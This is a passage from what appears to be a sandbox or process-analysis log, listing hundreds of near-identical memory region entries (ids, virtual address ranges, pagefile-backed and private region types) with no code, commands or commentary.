pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13213 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13215 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13216 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13235 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13248 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 13261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13263 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13384 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13385 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13386 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13387 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13388 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13390 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13391 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13392 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 13393 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13395 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13397 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13417 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13418 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13419 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
13431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13440 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13441 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13442 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13447 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 13448 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13449 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13450 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13451 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13452 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13453 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13454 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13455 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13456 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13457 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13458 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13459 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13460 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 13461 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13462 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13463 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13464 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13465 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13466 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13467 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13468 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13486 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13489 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13492 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13625 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13626 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13627 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13628 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13629 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13630 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13631 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13632 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13633 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13634 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13635 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13636 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13637 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13638 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13639 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13640 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13641 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13642 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13643 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 13644 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13645 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13646 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13647 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13648 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13649 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13650 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13651 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13652 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13653 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13654 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13655 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13656 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 13657 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13658 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13659 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13660 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13661 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13662 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13663 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13664 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13665 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13666 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13667 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13668 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13669 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
